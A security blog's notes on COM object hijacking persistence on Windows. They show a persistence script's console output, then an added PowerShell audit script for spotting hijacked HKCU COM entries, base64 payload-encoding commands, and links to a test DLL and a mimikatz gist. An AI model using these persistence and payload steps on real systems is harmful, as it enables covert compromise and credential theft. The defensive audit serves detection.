Video demo:

https://github.com/3gstudent/COM-Object-hijacking

Without noticing it, I have been walking this security road for almost two years. This blog records what I learn. Keep going!

Payload encryption

PS C:\Users\demon> powershell -ExecutionPolicy Bypass -File "C:\Users\demon\Desktop\COM Object hijacking persistence.ps1"
[*] Searching Folder...
[+] Create Folder: C:\Users\demon\AppData\Roaming\Microsoft\Installer\
[+] Create Folder: C:\Users\demon\AppData\Roaming\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}
[*] Detecting operating system...
[+] OS: x64
[*] Releasing file...
[+] Done.
[*] Modifying registry...
[*] 64-bit:
[*] 32-bit:
[+] Done.
PS C:\Users\demon>
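The session above shows the persistence script dropping a {CLSID}-named folder under AppData\Roaming\Microsoft\Installer and then writing 64-bit and 32-bit registry entries. From the defender's side, the thing to audit is the per-user COM registration that makes this work: an InprocServer32 entry under HKCU\Software\Classes\CLSID is resolved before the machine-wide HKLM entry for the same CLSID, so a user-level DLL path silently replaces a legitimate system server. The following audit script is an added example, not code from the original post or from the 3gstudent project. It assumes two indicators (assumptions, not facts stated on the page): the registered DLL lives under a user-writable profile directory such as AppData, and the same CLSID also exists under HKLM, meaning the user entry shadows a legitimate server. Function and parameter names are hypothetical.

```powershell
# Added audit script (not part of the original post or the 3gstudent project).
# Enumerates per-user COM servers under HKCU\Software\Classes\CLSID (64-bit and
# Wow6432Node views) and flags the two assumed hijack indicators described above.

function Get-SuspiciousComServer {
    [CmdletBinding()]
    param(
        # Directories treated as user-writable drop locations (assumption).
        [string[]]$UserWritableRoots = @($env:APPDATA, $env:LOCALAPPDATA, $env:TEMP)
    )

    $hives = @(
        'Registry::HKEY_CURRENT_USER\Software\Classes\CLSID',
        'Registry::HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID'
    )

    foreach ($hive in $hives) {
        if (-not (Test-Path -Path $hive)) { continue }

        foreach ($clsidKey in Get-ChildItem -Path $hive -ErrorAction SilentlyContinue) {
            $inproc = Join-Path -Path $clsidKey.PSPath -ChildPath 'InprocServer32'
            if (-not (Test-Path -Path $inproc)) { continue }

            # The default value of InprocServer32 is the DLL COM will load for this CLSID.
            $dll = (Get-ItemProperty -Path $inproc -ErrorAction SilentlyContinue).'(default)'
            if ([string]::IsNullOrWhiteSpace($dll)) { continue }
            $expanded = [Environment]::ExpandEnvironmentVariables($dll).Trim('"')

            # Indicator 1: DLL path sits under a user-writable profile directory.
            $inUserDir = $false
            foreach ($root in $UserWritableRoots) {
                if ($root -and $expanded.StartsWith($root, [StringComparison]::OrdinalIgnoreCase)) {
                    $inUserDir = $true
                }
            }

            # Indicator 2: a machine-wide registration exists for the same CLSID,
            # so the HKCU entry shadows it (the classic COM hijack pattern).
            $hklmKey = $clsidKey.PSPath -replace '^.*HKEY_CURRENT_USER', 'Registry::HKEY_LOCAL_MACHINE'
            $shadowsHklm = Test-Path -Path (Join-Path -Path $hklmKey -ChildPath 'InprocServer32')

            [pscustomobject]@{
                CLSID       = $clsidKey.PSChildName
                Hive        = $hive
                Dll         = $expanded
                DllExists   = Test-Path -LiteralPath $expanded
                InUserDir   = $inUserDir
                ShadowsHKLM = $shadowsHklm
                Suspicious  = ($inUserDir -or $shadowsHklm)
            }
        }
    }
}

# Usage: show only the flagged entries; review each before acting on it.
Get-SuspiciousComServer | Where-Object Suspicious | Format-Table -AutoSize
```

Run it in an unelevated session for the user being investigated, since HKCU is per-user. An entry that is both InUserDir and ShadowsHKLM is the strongest signal; a legitimate per-user COM registration (a user-scoped application install) can trip InUserDir alone, so check the DLL's signature and install history before removing the key. Remediation is to delete the HKCU InprocServer32 key (or the whole HKCU CLSID subkey) so resolution falls back to the HKLM server, and to remove the dropped DLL.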


PS C:\Users\demon> $fileContent = [System.IO.File]::ReadAllBytes('C:\Users\demon\Desktop\calcmutex.dll')
PS C:\Users\demon> $fileContentEncoded = [System.Convert]::ToBase64String($fileContent)| set-content ("123.txt")

http://www.4hou.com/technology/4958.html
https://github.com/3gstudent/test/blob/master/calcmutex.dll


2. xml_mimikatz
https://gist.github.com/caseysmithrc/b1190e023cd29c1910c01a164675a22e